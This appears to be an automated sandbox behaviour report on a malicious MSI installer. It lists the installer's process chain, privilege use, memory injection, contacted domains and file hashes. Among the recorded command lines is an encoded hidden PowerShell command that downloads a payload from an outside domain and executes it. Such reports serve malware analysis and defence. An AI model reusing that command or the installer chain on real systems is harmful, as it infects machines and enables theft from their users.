File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSID7A9.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57bd87.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIBE7D.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC130.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID808.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF7D4F2CE294910176.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57bd83.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC0B1.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC11F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC160.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF947F9C9271B489D4.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{982F5EC8-DA77-4501-8948-29ED7D39B6D6} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIDC9D.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF2BBD3D39CB6F990F.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57bd83.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC180.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF669FFF9BB76BF927.TMP C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2276 wrote to memory of 2932 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2276 wrote to memory of 2932 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2276 wrote to memory of 2932 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2276 wrote to memory of 2528 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe
PID 2276 wrote to memory of 2528 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe
PID 2276 wrote to memory of 1492 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe
PID 2276 wrote to memory of 1492 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe
PID 1492 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 1492 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 1492 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 1492 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 2844 wrote to memory of 1824 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1824 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 4980 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\zQ6y7W1swWaYu86\svchost.exe
PID 2844 wrote to memory of 4980 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\zQ6y7W1swWaYu86\svchost.exe
PID 4980 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\zQ6y7W1swWaYu86\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4980 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\zQ6y7W1swWaYu86\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4980 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\zQ6y7W1swWaYu86\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4980 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\zQ6y7W1swWaYu86\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4980 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\zQ6y7W1swWaYu86\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 7757EDA75F6D1EC599D8A488278B2B1F

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe

"C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe" x -p2161183588a "C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\nijboq.rar" "C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\"

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe

"C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AdAB3AG8ALQByAG8AbwB0AC4AYwBvAG0ALwAwADIAMAA3ADQALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=

C:\Users\Admin\AppData\Local\Temp\zQ6y7W1swWaYu86\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\zQ6y7W1swWaYu86\svchost.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 get-license2.com udp
US 104.21.17.66:443 get-license2.com tcp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 66.17.21.104.in-addr.arpa udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 172.67.184.27:80 hit-1488.com tcp
US 104.21.62.203:443 replica-souls.com tcp
US 172.67.169.37:443 two-root.com tcp
US 104.21.11.249:80 run-df.com tcp
US 104.21.11.249:443 run-df.com tcp
US 172.67.131.221:443 respectabledpcs.shop tcp
US 104.21.93.198:443 bouncedgowp.shop tcp
US 104.21.81.196:443 bannngwko.shop tcp
US 104.21.47.93:443 bargainnykwo.shop tcp
US 104.21.6.254:443 affecthorsedpo.shop tcp
US 104.21.68.158:443 radiationnopp.shop tcp
US 8.8.8.8:53 254.6.21.104.in-addr.arpa udp
US 8.8.8.8:53 answerrsdo.shop udp
US 172.67.203.63:443 answerrsdo.shop tcp
US 172.67.134.88:443 publicitttyps.shop tcp
US 104.21.81.128:443 benchillppwo.shop tcp
GB 23.214.143.155:443 steamcommunity.com tcp
US 172.67.214.98:443 reinforcedirectorywd.shop tcp

Files

C:\Windows\Installer\MSIBE7D.tmp

MD5 b158d8d605571ea47a238df5ab43dfaa
SHA1 bb91ae1f2f7142b9099e3cc285f4f5b84de568e4
SHA256 ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504
SHA512 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

C:\Windows\Installer\MSIC160.tmp

MD5 1a2b237796742c26b11a008d0b175e29
SHA1 cfd5affcfb3b6fd407e58dfc7187fad4f186ea18
SHA256 81e0df47bcb2b3380fb0fb58b0d673be4ef1b0367fd2b0d80ab8ee292fc8f730
SHA512 3135d866bf91f9e09b980dd649582072df1f53eabe4c5ac5d34fff1aeb5b6fa01d38d87fc31de19a0887a910e95309bcf0e7ae54e6e8ed2469feb64da4a4f9e5

C:\Windows\Installer\MSID808.tmp

MD5 54d74546c6afe67b3d118c3c477c159a
SHA1 957f08beb7e27e657cd83d8ee50388b887935fae
SHA256 f9956417af079e428631a6c921b79716d960c3b4917c6b7d17ff3cb945f18611
SHA512 d27750b913cc2b7388e9948f42385d0b4124e48335ae7fc0bc6971f4f807dbc9af63fe88675bc440eb42b9a92551bf2d77130b1633ddda90866616b583ae924f

C:\Config.Msi\e57bd86.rbs

MD5 56c3187fba810238260199482e0bb5c0
SHA1 8b6cbceb4626d2e681391752aae0e94e984ffa9a
SHA256 2028ba91bd4e814fda9ac8570892dcdddf5c173032f5ac5c959698a305379f97
SHA512 4c26508412fca29c9389164fd1a4e4bc858f7ded20c57ea57c267a7dd74221e30159a533bccb6ebe01df6f2719d42bbc7134ebd4484e2068adc7f73f8b36bf4f

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe

MD5 98ccd44353f7bc5bad1bc6ba9ae0cd68
SHA1 76a4e5bf8d298800c886d29f85ee629e7726052d
SHA256 e51021f6cb20efbd2169f2a2da10ce1abca58b4f5f30fbf4bae931e4ecaac99b
SHA512 d6e8146a1055a59cba5e2aaf47f6cb184acdbe28e42ec3daebf1961a91cec5904554d9d433ebf943dd3639c239ef11560fa49f00e1cff02e11cd8d3506c4125f

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\nijboq.rar

MD5 63efe86838e7196cedd93d7c10ac40e6
SHA1 61dcc0ce49355f1f44a7c2ee97ace10feece2e03
SHA256 9e7f5695c50bde002223c72084b44d8d22ab12c3ad2ce993e1f08ae90c6d6172
SHA512 7773e45af4c85b35aa9afb347fab3723eef9469cd4ed45fda89e058167a57b66b106ef8cce7fdc90701dd13279a8ab61e45f7f4c7df8fd084e6513f362483dac

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe

MD5 ae63517a3ce7949a2c084cd7541c2fd8
SHA1 8dafa610a0c3aa6ee2e50f657c90757bfae80336
SHA256 14b6f5c640c73cdd99e5834e7a56ab3d2912abe623bf5e41946154dad69e5f26
SHA512 fd5a85d902b376226d14bafe7c9ad9aabfc5245c61e2c3c17d12227dccbd9aee3b21e59a9357349dabcdc5ecafda9fc2ab737e8f06d7b7490931648021b3c1f3

C:\Windows\Installer\e57bd83.msi

MD5 6e619d3d24f58bfb7bd7e76a4756e258
SHA1 890359e1e86525c4c14e975e762239878134b32d
SHA256 5b3a41ed8a9a619b4aa18cef611c94b3273671ad464847cbfa600a6571c64431
SHA512 1a1f432c3c8ed5c627b2724b1fc5600ba31859838445b67d137c29439345e48bebe16074c3d9f909958af31670764422b379d7ced52c13feca7468e25a10162e

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnp.dll

MD5 1825d0310bf5029899f42004c4a1ef83
SHA1 ac79aab26730982838f5af5eadfa1e48f4625947
SHA256 1c45bf1b4b0dbbf3eec7fbe8d08640c8df98a9679c9753a295a5d2e29d8b6a58
SHA512 7c7c433b74c9b247401af4b72563256bfef055a8f5e65071ddcffe727502445be7760b64a1e7844e69c625dda899b928500dcb2c144defcc1ccf2ed206632145

memory/1492-158-0x000002A14A320000-0x000002A14A321000-memory.dmp

memory/1492-163-0x000002A14A2E0000-0x000002A14A305000-memory.dmp

memory/2844-164-0x00000000007B0000-0x00000000007D8000-memory.dmp

memory/2844-165-0x00000000007B0000-0x00000000007D8000-memory.dmp

memory/2844-166-0x00000000007B0000-0x00000000007D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pfsnsk4v.5sw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1824-173-0x0000018520230000-0x0000018520252000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\zQ6y7W1swWaYu86\svchost.exe

MD5 c3a8a0fd943924bfbd176c99df56ed2c
SHA1 8bc8d69cbec44704f062c08a919da992a425c720
SHA256 d1556baf48f206639e69f0e800e3360aa362f267c1c30b724140b6c713648df6
SHA512 71edb53cbf8d52d79615d5db834430870d6764ddcca4d8cf61d5fc4ddf404b259a974eb90944028ff20153561aa8b9fcc3374ae9badc6f6ac6b6d30150444f41

memory/2844-198-0x00000000007B0000-0x00000000007D8000-memory.dmp

memory/1824-199-0x0000018520730000-0x000001852074C000-memory.dmp

memory/1824-234-0x0000018520920000-0x0000018520AE2000-memory.dmp

memory/1824-235-0x0000018521020000-0x0000018521548000-memory.dmp

memory/2844-236-0x00000000007B0000-0x00000000007D8000-memory.dmp

memory/2604-245-0x0000000000F80000-0x0000000000FD7000-memory.dmp

memory/2604-247-0x0000000000F80000-0x0000000000FD7000-memory.dmp

memory/4980-246-0x00007FF79C210000-0x00007FF79CB91000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-10 10:22

Reported

2024-07-10 10:29

Platform

win7-20240704-en

Max time kernel

121s

Max time network

163s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\f76b471.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f76b474.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB636.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB7DD.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICF36.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIDED1.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76b476.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f76b471.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB51C.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76b474.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB6D3.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICEB8.tmp C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
